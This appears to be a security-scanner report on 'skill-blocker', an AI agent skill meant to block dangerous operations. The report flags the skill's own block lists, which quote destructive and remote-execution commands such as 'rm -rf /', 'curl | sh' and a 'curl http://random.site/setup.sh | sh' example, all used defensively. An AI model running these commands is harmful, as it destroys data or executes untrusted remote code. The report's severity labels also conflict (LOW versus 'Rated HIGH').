Summary
skill-blocker v1.0.1 was classified as MEDIUM RISK with a risk score of 13.8. Sigil detected 9 findings across 2 files, covering phases including install hooks, code patterns, network exfiltration. Review the findings below before installing this package.
v1.0.1
4 May 2026, 03:20 UTC
by Sigil Bot
Risk Score
13.8
Findings
9
Files Scanned
2
Provenance
Findings by Phase
Phase Ordering
Phases are ordered by criticality, with the most dangerous at the top. Click any phase header to expand or collapse its findings. Critical phases are expanded by default.
install-makefile-curl
LOWMakefile/script pipes remote content to shell
SKILL.md:3
name: skill-blocker
description: 危险技能拦截器 | Dangerous operation blocker and security gatekeeper. Blocks risky commands, unsafe file operations, and suspicious network requests before they execute. Use when you need to prevent harmful actions like destructive file deletions, credential exfiltration, or unauthorized system changes. Automatically detects and blocks patterns: rm -rf /, curl | sh, eval(), SSH to unknown hosts, modifications to sensitive config files, data exfiltration attempts. 检测并阻止危Why was this flagged?
A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.
install-makefile-curl
LOWMakefile/script pipes remote content to shell
SKILL.md:22
| **文件删除** | `rm -rf /`, `rm -rf ~`, `rm -rf /*` | 🔴 严重 |
| **网络执行** | `curl http://... \| sh`, `wget ... \| bash`, `pip install \$(...)` | 🔴 严重 |
| **代码注入** | `eval()`, `exec()` 带外部输入,`Function(` 构造器 | 🔴 严重 |Why was this flagged?
A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.
install-makefile-curl
LOWMakefile/script pipes remote content to shell
SKILL.md:73
RED_FLAGS = [
"curl | sh", "wget | bash", # 网络执行
"eval(", "exec(", # 代码注入 Why was this flagged?
A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.
install-makefile-curl
LOWMakefile/script pipes remote content to shell
SKILL.md:228
"帮我删除主目录" → rm -rf ~ ❌
"运行我在网上找的这个脚本" → curl http://random.site/setup.sh | sh ❌
"评估这个用户输入" → eval(user_input) ❌Why was this flagged?
A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.
Badge
Markdown
[](https://sigilsec.ai/scans/D042D692-33A7-431A-B179-5B10833BCAB1)HTML
<a href="https://sigilsec.ai/scans/D042D692-33A7-431A-B179-5B10833BCAB1"><img src="https://sigilsec.ai/badge/clawhub/skill-blocker" alt="Sigil Scan"></a>Run This Scan Yourself
Scan your own packages
Run Sigil locally to audit any package before it touches your codebase.
Sigil Pro
Cloud scanning, AI investigation, web dashboard, and CI/CD integration. 30-day free trial.
Start free trial →Get threat intelligence and product updates
Security research, new threat signatures, and product updates. No spam.
Other clawhub scans
Believe this result is incorrect? Request a review or see our Terms of Service and Methodology.